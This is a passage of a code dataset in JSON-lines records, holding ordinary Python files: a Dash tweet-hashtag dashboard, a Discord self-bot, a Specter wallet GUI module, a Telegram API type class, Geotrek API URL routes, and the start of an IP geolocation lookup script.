'RT'})\ncols_from_txt=list(df_txt.columns.values)\ncols_from_txt.remove('Place')\ncols_from_txt.remove('Id Str')\ncols_from_txt.remove('Url')\ncols_from_txt.remove('Mentions')\ncols_from_txt.remove('Hashtags')\ndf_txt['Hashtags_lower']=df_txt.Hashtags.apply(lambda x: [z.lower() for z in eval(x)])\n#df_txt['Hashtags']=df_txt.Hashtags.apply(lambda x: ', '.join([\"#\" + z for z in eval(x)]))\n#df_txt['Url']=df_txt.Url.apply(lambda x: ', '.join([z for z in eval(x)]))\n#df_txt['Mentions']=df_txt.Mentions.apply(lambda x: ', '.join([\"@\" + z for z in eval(x)]))\n\napp_dash.layout = html.Div(id='dash-container',\n children=[\n\n html.Div(\n [dcc.Graph(\n style={'height': 300},\n id='bar-mentions-counts',\n figure=dict(\n data= [\n {'x': list(df_tpc.index.values), 'y': list(df_tpc.Mentions.values), 'type': 'bar', 'name': 'Nr Tweets'}\n ],\n layout=dict(\n title='Top 50 Hashtags for #AI',\n showlegend=True,\n legend=dict(\n x=0,\n y=1.0\n ),\n margin=dict(l=40, r=0, t=40, b=80)\n )\n )\n )] ,\n #style={'width': '25%', 'display': 'inline-block'}\n ), \n html.Div(\n [dcc.Graph(\n style={'height': 300},\n id='my-graph'\n )] ,\n style={'width': '70%', 'display': 'inline-block'}\n ), \n html.Div(\n [dcc.Graph(\n style={'height': 300},\n id='bar-authors-counts',\n )] ,\n style={'width': '30%', 'display': 'inline-block'}\n ), \n html.H1('',''),\n html.Div(\n [dash_table.DataTable(\n id='nws-table',\n columns=[{\"name\": i, \"id\": i} for i in cols_from_txt],\n #fixed_rows={'headers': True},\n style_cell={'textAlign': 'left'},\n style_data={\n 'whiteSpace': 'normal',\n 'height': 'auto'\n },\n style_as_list_view=True,\n style_data_conditional=[\n {\n 'if': {'row_index': 'odd'},\n 'backgroundColor': 'rgb(248, 248, 248)'\n }\n ],\n style_header={\n 'backgroundColor': 'rgb(230, 230, 230)',\n 'fontWeight': 'bold'\n }\n )]\n )\n ])\n\n@app_dash.callback(Output('my-graph', 'figure'),\n [Input('bar-mentions-counts', 'clickData')])\ndef update_figure(list_from_click):\n '''\n if isinstance(list_of_stocks,str):\n list_of_stocks=[list_of_stocks]\n \n if 
list_from_click:\n '''\n \n if list_from_click:\n list_of_topics=[clk['x'] for clk in list_from_click['points']]\n else:\n list_of_topics=['ai']\n\n data=[\n dict(\n x=list(df_tim[df_tim.term==hashtag.lower()].time.values),\n y=list(df_tim[df_tim.term==hashtag.lower()].id.values),\n name=hashtag,\n ) for hashtag in list_of_topics\n ]\n return dict(\n data=data\n ,\n layout=dict(\n title='Mentions over time',\n showlegend=True,\n legend=dict(\n x=0,\n y=1.0\n ),\n xaxis=dict(type='category',nticks=15),\n xaxis_tickformat ='%Y-%m-%d', \n margin=dict(l=40, r=0, t=40, b=70), \n )\n )\n\n@app_dash.callback(Output('bar-authors-counts', 'figure'),\n [Input('bar-mentions-counts', 'clickData')])\ndef update_bar_authors(list_from_click):\n\n if list_from_click:\n list_of_topics=[clk['x'] for clk in list_from_click['points']]\n else:\n list_of_topics=['ai']\n authors_limit=30\n data=[\n dict(\n x=list(df_aut[df_aut.term==hashtag.lower()].original_user.iloc[:authors_limit].values),\n y=list(df_aut[df_aut.term==hashtag.lower()].id.iloc[:authors_limit].values),\n type='bar',\n name='#'+hashtag,\n ) for hashtag in list_of_topics\n ]\n return dict(\n data= data,\n layout=dict(\n title='Nr Tweets by Author per Hashatag',\n showlegend=True,\n legend=dict(\n x=0,\n y=1.0\n ),\n margin=dict(l=40, r=0, t=40, b=80)\n )\n )\n\n\n@app_dash.callback(Output('nws-table', 'data'),\n [Input('bar-mentions-counts', 'clickData')])\ndef update_table(list_from_click):\n\n if list_from_click:\n list_of_stocks=[clk['x'].lower() for clk in list_from_click['points']]\n else:\n list_of_stocks=['ai']\n\n df_out=df_txt.copy()\n indicator=df_txt['Hashtags_lower'].apply(lambda x: len(set(x) & set(list_of_stocks))>0).values\n df_out=df_out[indicator].sort_values('Favs', ascending=False)\n df_out=df_out[cols_from_txt]\n \n return df_out.to_dict('records')\n\n\n@app.route(\"/dash\")\ndef MyDashApp():\n return app_dash.index()\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n", "sub_path": "old/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 7337, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 17, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 32, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 45, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 48, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 49, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 69, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 70, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 76, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 77, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 83, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 84, "usage_type": "call"}, {"api_name": "dash_table.DataTable", "line_number": 85, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 109, "usage_type": "call"}, {"api_name": 
"dash.dependencies.Input", "line_number": 110, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 147, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 148, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 178, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 179, "usage_type": "call"}]} +{"seq_id": "417911223", "text": "from discord import Embed\nfrom discord.errors import HTTPException\nfrom discord.ext.commands import Bot\n\nfrom util import misc\n\nbot = Bot(command_prefix=\"self_\", self_bot=True)\n\n\n@bot.event\nasync def on_ready():\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n print('------')\n\n extensions = ['cogs.base',\n 'cogs.chart',\n 'cogs.owner',\n 'cogs.server',\n 'cogs.stars']\n for extension in extensions:\n try:\n bot.load_extension(extension)\n except Exception as e:\n print('Failed to load extension {}.'.format(extension))\n print(e)\n\n\n@bot.event\nasync def on_message(message):\n try:\n await bot.process_commands(message)\n except HTTPException as err:\n await message.channel.send(err)\n raise\n\n\n@bot.event\nasync def on_reaction_add(reaction, user):\n if user.id == bot.user.id:\n # print(\"Reaction at \" + datetime.now().strftime(\"%H:%M:%S\"))\n global reaction_text\n if reaction.emoji == '\\U0001F643' and reaction_text != '':\n await reaction.message.remove_reaction(reaction.emoji, user)\n for a in reaction_text.lower():\n if a.isalpha():\n emoji = misc.get_alpha_emoji(a)\n await reaction.message.add_reaction(emoji)\n reaction_text = ''\n\n\n@bot.command()\nasync def prime(ctx, *, react: str = None):\n if react is not None:\n global reaction_text\n reaction_text = react\n # await bot.edit_message(ctx.message, 'Reaction primed. 
Trigger with \\U0001F643')\n # await asyncio.sleep(1)\n await ctx.message.delete()\n\n\n@bot.command()\nasync def unprime(ctx):\n global reaction_text\n reaction_text = \"\"\n await ctx.message.delete()\n\n\n@bot.command()\nasync def embed(ctx):\n split = ctx.message.content.split(\" \", 1)\n if len(split) > 1:\n parts = split[1].split(\" | \")\n if len(parts) == 3:\n em = Embed(title=parts[0], color=0xff0000)\n em.add_field(name=parts[1], value=parts[2])\n await ctx.send(embed=em)\n if len(parts) == 4:\n em = Embed(title=parts[0], color=int(parts[3]))\n em.add_field(name=parts[1], value=parts[2])\n await ctx.send(embed=em)\n await ctx.message.delete()\n\n\nwith open('selftoken.txt', 'r') as token_file:\n token = token_file.readline().strip()\nbot.run(token, bot=False)\n", "sub_path": "Self_Bot.py", "file_name": "Self_Bot.py", "file_ext": "py", "file_size_in_byte": 2482, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "discord.ext.commands.Bot", "line_number": 7, "usage_type": "call"}, {"api_name": "discord.errors.HTTPException", "line_number": 34, "usage_type": "name"}, {"api_name": "util.misc.get_alpha_emoji", "line_number": 48, "usage_type": "call"}, {"api_name": "util.misc", "line_number": 48, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 76, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "648487715", "text": "from .async_gui import AsyncGUI\nfrom .screens import (Screen, PinScreen, Progress,\n MnemonicScreen, NewMnemonicScreen, RecoverMnemonicScreen,\n DevSettings)\nimport rng, asyncio\n\nclass SpecterGUI(AsyncGUI):\n \"\"\"Specter-related GUI\"\"\"\n async def get_pin(self, title=\"Enter your PIN code\", get_word=None):\n \"\"\"\n Async version of the PIN screen.\n Waits for an event that is set in the callback.\n \"\"\"\n pin_scr = PinScreen(title=title, \n note=\"Do you recognize these words?\", \n get_word=get_word)\n await self.load_screen(pin_scr)\n return await pin_scr.result()\n\n async def setup_pin(self, get_word=None):\n \"\"\"\n PIN setup screen - first choose, then confirm\n If PIN codes are the same -> return the PIN\n If not -> try again\n \"\"\"\n pin_scr = PinScreen(title=\"Choose your PIN code\", \n note=\"Remember these words, they will stay the same on this device.\", \n get_word=get_word)\n await self.load_screen(pin_scr)\n \n pin1 = await pin_scr.result()\n\n pin_scr.reset()\n pin_scr.title.set_text(\"Confirm your PIN code\")\n pin2 = await pin_scr.result()\n\n # check if PIN is the same\n if pin1 == pin2:\n return pin1\n # if not - show an error\n await self.error(\"PIN codes are different!\")\n return await self.setup_pin(get_word)\n\n async def show_mnemonic(self, mnemonic:str):\n \"\"\"\n Shows mnemonic on the screen\n \"\"\"\n scr = MnemonicScreen(mnemonic)\n await self.load_screen(scr)\n return await scr.result()\n\n async def new_mnemonic(self, generator):\n \"\"\"\n Generates a new mnemonic and shows it on the screen\n \"\"\"\n scr = NewMnemonicScreen(generator)\n await self.load_screen(scr)\n return await scr.result()\n\n async def recover(self, checker=None, lookup=None):\n \"\"\"\n Asks the user for his recovery phrase.\n checker(mnemonic) - a function that validates recovery phrase\n lookup(word, num_candidates) - a function that \n returns num_candidates words starting with word\n \"\"\"\n scr = RecoverMnemonicScreen(checker, lookup)\n await self.load_screen(scr)\n return await scr.result()\n\n 
def set_network(self, net):\n \"\"\"Changes color of the top line on all screens to network color\"\"\"\n Screen.network = net\n\n async def show_progress(self, host, title, message):\n \"\"\"\n Shows progress screen and cancel button \n to cancel communication with the host\n \"\"\"\n scr = Progress(title, message, button_text=\"Cancel\")\n await self.open_popup(scr)\n asyncio.create_task(self.coro(host, scr))\n\n async def coro(self, host, scr):\n \"\"\"\n Waits for one of two events:\n - either user presses something on the screen\n - or host finishes processing\n Also updates progress screen\n \"\"\"\n while host.in_progress and scr.waiting:\n await asyncio.sleep_ms(30)\n scr.tick(5)\n scr.set_progress(host.progress)\n if host.in_progress:\n host.abort()\n if scr.waiting:\n scr.waiting = False\n await self.close_popup()\n\n async def devscreen(self, dev=False, usb=False):\n scr = DevSettings(dev=dev, usb=usb)\n await self.load_screen(scr)\n return await scr.result()\n", "sub_path": "src/gui/specter.py", "file_name": "specter.py", "file_ext": "py", "file_size_in_byte": 3533, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "async_gui.AsyncGUI", "line_number": 7, "usage_type": "name"}, {"api_name": "screens.PinScreen", "line_number": 14, "usage_type": "call"}, {"api_name": "screens.PinScreen", "line_number": 26, "usage_type": "call"}, {"api_name": "screens.MnemonicScreen", "line_number": 48, "usage_type": "call"}, {"api_name": "screens.NewMnemonicScreen", "line_number": 56, "usage_type": "call"}, {"api_name": "screens.RecoverMnemonicScreen", "line_number": 67, "usage_type": "call"}, {"api_name": "screens.Screen.network", "line_number": 73, "usage_type": "attribute"}, {"api_name": "screens.Screen", "line_number": 73, "usage_type": "name"}, {"api_name": "screens.Progress", "line_number": 80, "usage_type": "call"}, {"api_name": "asyncio.create_task", "line_number": 82, "usage_type": "call"}, {"api_name": "asyncio.sleep_ms", "line_number": 92, "usage_type": "call"}, {"api_name": "screens.DevSettings", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "137698149", "text": "\n\nfrom ..utils import Object\n\n\nclass ChatInviteLinkInfo(Object):\n \"\"\"\n Contains information about a chat invite link\n\n Attributes:\n ID (:obj:`str`): ``ChatInviteLinkInfo``\n\n Args:\n chat_id (:obj:`int`):\n Chat identifier of the invite link; 0 if the user is not a member of this chat\n type (:class:`telegram.api.types.ChatType`):\n Contains information about the type of the chat\n title (:obj:`str`):\n Title of the chat\n photo (:class:`telegram.api.types.chatPhoto`):\n Chat photo; may be null\n member_count (:obj:`int`):\n Number of members in the chat\n member_user_ids (List of :obj:`int`):\n User identifiers of some chat members that may be known to the current user\n is_public (:obj:`bool`):\n True, if the chat is a public supergroup or channel, i.e. it has a username or it is a location-based supergroup\n\n Returns:\n ChatInviteLinkInfo\n\n Raises:\n :class:`telegram.Error`\n \"\"\"\n ID = \"chatInviteLinkInfo\"\n\n def __init__(self, chat_id, type, title, photo, member_count, member_user_ids, is_public, **kwargs):\n \n self.chat_id = chat_id # int\n self.type = type # ChatType\n self.title = title # str\n self.photo = photo # ChatPhoto\n self.member_count = member_count # int\n self.member_user_ids = member_user_ids # list of int\n self.is_public = is_public # bool\n\n @staticmethod\n def read(q: dict, *args) -> 
\"ChatInviteLinkInfo\":\n chat_id = q.get('chat_id')\n type = Object.read(q.get('type'))\n title = q.get('title')\n photo = Object.read(q.get('photo'))\n member_count = q.get('member_count')\n member_user_ids = q.get('member_user_ids')\n is_public = q.get('is_public')\n return ChatInviteLinkInfo(chat_id, type, title, photo, member_count, member_user_ids, is_public)\n", "sub_path": "pytglib/api/types/chat_invite_link_info.py", "file_name": "chat_invite_link_info.py", "file_ext": "py", "file_size_in_byte": 1954, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils.Object", "line_number": 6, "usage_type": "name"}, {"api_name": "utils.Object.read", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.Object", "line_number": 50, "usage_type": "name"}, {"api_name": "utils.Object.read", "line_number": 52, "usage_type": "call"}, {"api_name": "utils.Object", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "446799355", "text": "from django.conf import settings\nfrom django.urls import path, include\nfrom django.views.generic import RedirectView\nfrom rest_framework import routers\n\nfrom geotrek.api.v2 import views as api_views\nfrom geotrek.api.v2.viewsets import get_geotrek_version\n\n\nrouter = routers.DefaultRouter()\nrouter.register('structure', api_views.StructureViewSet, basename='structure')\nrouter.register('portal', api_views.TargetPortalViewSet, basename='portal')\nrouter.register('theme', api_views.ThemeViewSet, basename='theme')\nrouter.register('source', api_views.SourceViewSet, basename='source')\nrouter.register('reservationsystem', api_views.ReservationSystemViewSet, basename='reservationsystem')\nrouter.register('label', api_views.LabelViewSet, basename='label')\nrouter.register('organism', api_views.OrganismViewSet, basename='organism')\nif 'geotrek.core' in settings.INSTALLED_APPS:\n router.register('path', api_views.PathViewSet, basename='path')\nif 'geotrek.feedback' in settings.INSTALLED_APPS:\n router.register('feedback_status', api_views.ReportStatusViewSet, basename='feedback-status')\n router.register('feedback_category', api_views.ReportCategoryViewSet, basename='feedback-category')\n router.register('feedback_activity', api_views.ReportActivityViewSet, basename='feedback-activity')\n router.register('feedback_magnitude', api_views.ReportProblemMagnitudeViewSet, basename='feedback-magnitude')\nif 'geotrek.trekking' in settings.INSTALLED_APPS:\n router.register('trek', api_views.TrekViewSet, basename='trek')\n router.register('poi', api_views.POIViewSet, basename='poi')\n router.register('poi_type', api_views.POITypeViewSet, basename='poitype')\n router.register('tour', api_views.TourViewSet, basename='tour')\n router.register('trek_accessibility', api_views.AccessibilityViewSet, basename='accessibility')\n router.register('trek_route', api_views.RouteViewSet, basename='route')\n router.register('trek_difficulty', api_views.DifficultyViewSet, basename='difficulty')\n router.register('trek_network', api_views.NetworkViewSet, basename='network')\n router.register('trek_practice', api_views.PracticeViewSet, basename='practice')\n router.register('weblink_category', api_views.WebLinkCategoryViewSet, basename='weblink-category')\nif 'geotrek.tourism' in settings.INSTALLED_APPS:\n router.register('touristiccontent_category', api_views.TouristicContentCategoryViewSet,\n basename='touristiccontentcategory')\n router.register('touristiccontent', api_views.TouristicContentViewSet, 
basename='touristiccontent')\n router.register('touristicevent', api_views.TouristicEventViewSet, basename='touristicevent')\n router.register('touristicevent_type', api_views.TouristicEventTypeViewSet, basename='touristiceventtype')\n router.register('informationdesk', api_views.InformationDeskViewSet, basename='informationdesk')\nif 'geotrek.sensitivity' in settings.INSTALLED_APPS:\n router.register('sensitivearea', api_views.SensitiveAreaViewSet, basename='sensitivearea')\n router.register('sensitivearea_practice', api_views.SportPracticeViewSet, basename='sportpractice')\n router.register('sensitivearea_species', api_views.SpeciesViewSet, basename='species')\nif 'geotrek.zoning' in settings.INSTALLED_APPS:\n router.register('city', api_views.CityViewSet, basename='city')\n router.register('district', api_views.DistrictViewSet, basename='district')\nif 'geotrek.outdoor' in settings.INSTALLED_APPS:\n router.register('outdoor_site', api_views.SiteViewSet, basename='site')\n router.register('outdoor_practice', api_views.OutdoorPracticeViewSet, basename='outdoor-practice')\n router.register('outdoor_sitetype', api_views.SiteTypeViewSet, basename='sitetype')\n router.register('outdoor_ratingscale', api_views.RatingScaleViewSet, basename='ratingscale')\n router.register('outdoor_rating', api_views.RatingViewSet, basename='rating')\n router.register('outdoor_course', api_views.CourseViewSet, basename='course')\nif 'geotrek.flatpages' in settings.INSTALLED_APPS:\n router.register('flatpage', api_views.FlatPageViewSet, basename='flatpage')\n\napp_name = 'apiv2'\n_urlpatterns = []\nif 'drf_yasg' in settings.INSTALLED_APPS:\n _urlpatterns.append(path('', api_views.schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'))\n_urlpatterns += [\n path('config/', api_views.ConfigView.as_view(), name='config'),\n path('sportpractice/', RedirectView.as_view(pattern_name='apiv2:sportpractice-list', permanent=True)),\n path('sportpractice/<int:pk>/', RedirectView.as_view(pattern_name='apiv2:sportpractice-detail', permanent=True)),\n path('', include(router.urls)),\n path('version', get_geotrek_version)\n]\nurlpatterns = [path('api/v2/', include(_urlpatterns))]\n", "sub_path": "geotrek/api/v2/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 4781, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 10, "usage_type": "call"}, {"api_name": "rest_framework.routers", "line_number": 10, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.StructureViewSet", "line_number": 11, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 11, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TargetPortalViewSet", "line_number": 12, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 12, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.ThemeViewSet", "line_number": 13, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 13, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.SourceViewSet", "line_number": 14, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 14, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.ReservationSystemViewSet", "line_number": 15, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 15, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.LabelViewSet", 
"line_number": 16, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 16, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.OrganismViewSet", "line_number": 17, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.PathViewSet", "line_number": 19, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.ReportStatusViewSet", "line_number": 21, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 21, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.ReportCategoryViewSet", "line_number": 22, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 22, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.ReportActivityViewSet", "line_number": 23, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 23, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.ReportProblemMagnitudeViewSet", "line_number": 24, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 24, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 25, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TrekViewSet", "line_number": 26, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 26, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.POIViewSet", "line_number": 27, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 27, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.POITypeViewSet", "line_number": 28, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 28, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TourViewSet", "line_number": 29, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 29, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.AccessibilityViewSet", "line_number": 30, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 30, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.RouteViewSet", "line_number": 31, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 31, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.DifficultyViewSet", "line_number": 32, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 32, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.NetworkViewSet", "line_number": 33, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 33, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.PracticeViewSet", "line_number": 34, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 34, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.WebLinkCategoryViewSet", "line_number": 35, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 35, "usage_type": "name"}, 
{"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 36, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TouristicContentCategoryViewSet", "line_number": 37, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 37, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TouristicContentViewSet", "line_number": 39, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 39, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TouristicEventViewSet", "line_number": 40, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 40, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TouristicEventTypeViewSet", "line_number": 41, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 41, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.InformationDeskViewSet", "line_number": 42, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 42, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 43, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.SensitiveAreaViewSet", "line_number": 44, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 44, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.SportPracticeViewSet", "line_number": 45, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 45, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.SpeciesViewSet", "line_number": 46, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 46, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 47, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 47, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.CityViewSet", "line_number": 48, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 48, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.DistrictViewSet", "line_number": 49, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 49, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 50, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 50, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.SiteViewSet", "line_number": 51, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 51, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.OutdoorPracticeViewSet", "line_number": 52, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 52, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.SiteTypeViewSet", "line_number": 53, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 53, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.RatingScaleViewSet", "line_number": 54, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 54, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.RatingViewSet", "line_number": 55, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 55, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.CourseViewSet", "line_number": 56, "usage_type": "attribute"}, 
{"api_name": "geotrek.api.v2.views", "line_number": 56, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 57, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 57, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.FlatPageViewSet", "line_number": 58, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 58, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 62, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 62, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 63, "usage_type": "call"}, {"api_name": "geotrek.api.v2.views.schema_view.with_ui", "line_number": 63, "usage_type": "call"}, {"api_name": "geotrek.api.v2.views.schema_view", "line_number": 63, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 63, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 65, "usage_type": "call"}, {"api_name": "geotrek.api.v2.views.ConfigView.as_view", "line_number": 65, "usage_type": "call"}, {"api_name": "geotrek.api.v2.views.ConfigView", "line_number": 65, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 65, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 66, "usage_type": "call"}, {"api_name": "django.views.generic.RedirectView.as_view", "line_number": 66, "usage_type": "call"}, {"api_name": "django.views.generic.RedirectView", "line_number": 66, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 67, "usage_type": "call"}, {"api_name": "django.views.generic.RedirectView.as_view", "line_number": 67, "usage_type": "call"}, {"api_name": "django.views.generic.RedirectView", "line_number": 67, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 68, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 68, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 69, "usage_type": "call"}, {"api_name": "geotrek.api.v2.viewsets.get_geotrek_version", "line_number": 69, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 71, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "436696749", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 26 10:21:49 2019\n\n@author: Administrator\n\"\"\"\nimport requests\nimport re\nfrom pyquery import PyQuery as pq\nimport json\n\ndef QueryIPJson(IP):\n try:\n if IP == None:\n return\n url = 'http://ip-api.com/json/'+str(IP)+'?lang=en'\n response = requests.get(url)\n response.encoding = 'utf8'\n html = response.text\n ipjson = json.loads(html)\n print(\"Location:\",ipjson['country'])\n return ipjson\n except:\n print(\"Location IP Fail\")\n \ndef LocateIP(IP):\n try:\n if IP == None:\n return\n #url = 'http://www.ip138.com/ips1388.asp?ip=' + str(IP) + '&action=2'\n url = 'http://www.882667.com/ip_'+str(IP)+\".html\"\n response = requests.get(url)\n response.encoding = 'gbk'\n html = response.text\n #print(html)\n doc = pq(html)\n temp = doc('body div div div:nth-child(4) .shenlansezi')\n #print(temp)\n 